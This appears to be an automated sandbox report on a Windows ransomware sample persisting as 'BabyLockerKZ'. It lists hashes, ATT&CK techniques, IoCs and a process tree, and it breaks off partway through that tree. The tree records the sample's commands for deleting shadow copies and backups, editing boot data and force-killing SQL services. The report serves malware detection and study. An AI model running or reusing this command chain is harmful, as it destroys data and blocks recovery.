9e0723c997227302cf234f9ae3888b0b18a4a1ec892ecab86aad3279ca455ee2

Resubmissions

14/12/2024, 01:58

241214-cd5lpsspev 10

14/12/2024, 01:33

241214-byxk6atrfq 10

Analysis

max time kernel
149s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/12/2024, 01:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
Size

422KB
MD5

a7b4ded56a745d078dfc02c6302d136e
SHA1

20b7e3930741e1ab3ab0f2f74617062b47fffbd8
SHA256

13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3
SHA512

0f3320c525141c3eea4ae28a199327f28784fa5f53f81b8abfeb2d5ae620286fdf1b60def07db8d256623f255f8ebd18c06b5880d423e58477686fb4cda79ea5
SSDEEP

6144:MTqhlztbElkd+s0zyykmkkES0J2txMLVesCjuwptsOXNZcX9PNCFR09KKPOeFhbb:RhDdkybr/J2tx2VeFusZXQJhkeFhbb

Score

10^/10

defense_evasion discovery evasion execution impact persistence ransomware

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3304 created 3548	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	56

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5008	bcdedit.exe
4076	bcdedit.exe

Renames multiple (152) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1504	wbadmin.exe

Deletes system backups 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1860	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe\""	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe\""	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\G:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\N:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\T:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\F:	cipher.exe
File opened (read-only)	\??\U:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\H:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\J:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\K:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\M:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\S:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\B:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\I:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\L:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\P:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\Z:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\V:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\W:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\X:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\F:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\A:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\O:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\Q:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\R:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
File opened (read-only)	\??\Y:	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2316	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
3348	taskkill.exe
3148	taskkill.exe
4120	taskkill.exe
1680	taskkill.exe
4964	taskkill.exe
2324	taskkill.exe
3980	taskkill.exe
4676	taskkill.exe
1960	taskkill.exe
4336	taskkill.exe
5000	taskkill.exe
3944	taskkill.exe
1920	taskkill.exe
540	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	3348	taskkill.exe
Token: SeDebugPrivilege	4676	taskkill.exe
Token: SeDebugPrivilege	3148	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	4120	taskkill.exe
Token: SeDebugPrivilege	5000	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	4964	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4808	WMIC.exe
Token: SeSecurityPrivilege	4808	WMIC.exe
Token: SeTakeOwnershipPrivilege	4808	WMIC.exe
Token: SeLoadDriverPrivilege	4808	WMIC.exe
Token: SeSystemProfilePrivilege	4808	WMIC.exe
Token: SeSystemtimePrivilege	4808	WMIC.exe
Token: SeProfSingleProcessPrivilege	4808	WMIC.exe
Token: SeIncBasePriorityPrivilege	4808	WMIC.exe
Token: SeCreatePagefilePrivilege	4808	WMIC.exe
Token: SeBackupPrivilege	4808	WMIC.exe
Token: SeRestorePrivilege	4808	WMIC.exe
Token: SeShutdownPrivilege	4808	WMIC.exe
Token: SeDebugPrivilege	4808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4808	WMIC.exe
Token: SeRemoteShutdownPrivilege	4808	WMIC.exe
Token: SeUndockPrivilege	4808	WMIC.exe
Token: SeManageVolumePrivilege	4808	WMIC.exe
Token: 33	4808	WMIC.exe
Token: 34	4808	WMIC.exe
Token: 35	4808	WMIC.exe
Token: 36	4808	WMIC.exe
Token: SeBackupPrivilege	2164	vssvc.exe
Token: SeRestorePrivilege	2164	vssvc.exe
Token: SeAuditPrivilege	2164	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3304 wrote to memory of 4204	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	83
PID 3304 wrote to memory of 4204	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	83
PID 3304 wrote to memory of 4204	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	83
PID 4204 wrote to memory of 4380	4204	cmd.exe	85
PID 4204 wrote to memory of 4380	4204	cmd.exe	85
PID 3304 wrote to memory of 3564	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	86
PID 3304 wrote to memory of 3564	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	86
PID 3304 wrote to memory of 3564	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	86
PID 3564 wrote to memory of 1420	3564	cmd.exe	88
PID 3564 wrote to memory of 1420	3564	cmd.exe	88
PID 1420 wrote to memory of 3980	1420	cmd.exe	89
PID 1420 wrote to memory of 3980	1420	cmd.exe	89
PID 3304 wrote to memory of 2008	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	91
PID 3304 wrote to memory of 2008	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	91
PID 3304 wrote to memory of 2008	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	91
PID 2008 wrote to memory of 2204	2008	cmd.exe	93
PID 2008 wrote to memory of 2204	2008	cmd.exe	93
PID 2204 wrote to memory of 1920	2204	cmd.exe	94
PID 2204 wrote to memory of 1920	2204	cmd.exe	94
PID 3304 wrote to memory of 1880	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	95
PID 3304 wrote to memory of 1880	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	95
PID 3304 wrote to memory of 1880	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	95
PID 1880 wrote to memory of 2844	1880	cmd.exe	97
PID 1880 wrote to memory of 2844	1880	cmd.exe	97
PID 2844 wrote to memory of 3348	2844	cmd.exe	98
PID 2844 wrote to memory of 3348	2844	cmd.exe	98
PID 3304 wrote to memory of 1360	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	99
PID 3304 wrote to memory of 1360	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	99
PID 3304 wrote to memory of 1360	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	99
PID 1360 wrote to memory of 4788	1360	cmd.exe	101
PID 1360 wrote to memory of 4788	1360	cmd.exe	101
PID 4788 wrote to memory of 4676	4788	cmd.exe	102
PID 4788 wrote to memory of 4676	4788	cmd.exe	102
PID 3304 wrote to memory of 4852	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	103
PID 3304 wrote to memory of 4852	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	103
PID 3304 wrote to memory of 4852	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	103
PID 4852 wrote to memory of 2976	4852	cmd.exe	106
PID 4852 wrote to memory of 2976	4852	cmd.exe	106
PID 2976 wrote to memory of 3148	2976	cmd.exe	107
PID 2976 wrote to memory of 3148	2976	cmd.exe	107
PID 3304 wrote to memory of 3556	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	108
PID 3304 wrote to memory of 3556	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	108
PID 3304 wrote to memory of 3556	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	108
PID 3556 wrote to memory of 2200	3556	cmd.exe	110
PID 3556 wrote to memory of 2200	3556	cmd.exe	110
PID 2200 wrote to memory of 1960	2200	cmd.exe	111
PID 2200 wrote to memory of 1960	2200	cmd.exe	111
PID 3304 wrote to memory of 2220	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	112
PID 3304 wrote to memory of 2220	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	112
PID 3304 wrote to memory of 2220	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	112
PID 2220 wrote to memory of 3592	2220	cmd.exe	114
PID 2220 wrote to memory of 3592	2220	cmd.exe	114
PID 3592 wrote to memory of 4336	3592	cmd.exe	115
PID 3592 wrote to memory of 4336	3592	cmd.exe	115
PID 3304 wrote to memory of 228	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	116
PID 3304 wrote to memory of 228	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	116
PID 3304 wrote to memory of 228	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	116
PID 228 wrote to memory of 3088	228	cmd.exe	118
PID 228 wrote to memory of 3088	228	cmd.exe	118
PID 3088 wrote to memory of 540	3088	cmd.exe	119
PID 3088 wrote to memory of 540	3088	cmd.exe	119
PID 3304 wrote to memory of 3964	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	120
PID 3304 wrote to memory of 3964	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	120
PID 3304 wrote to memory of 3964	3304	13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe	120

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3548
- C:\Users\Admin\AppData\Local\Temp\13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
  "C:\Users\Admin\AppData\Local\Temp\13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Adds Run key to start application
  - Enumerates connected drives
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3304
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
      4⤵
      PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlbrowser.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3980
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sql writer.exe
        5⤵
        Kills process with taskkill
        
        PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2844
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlserv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msmdsrv.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4676
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im MsDtsSrvr.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3148
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2200
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im sqlceip.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1960
- - C:\Windows\SysWOW64\cmd.exe
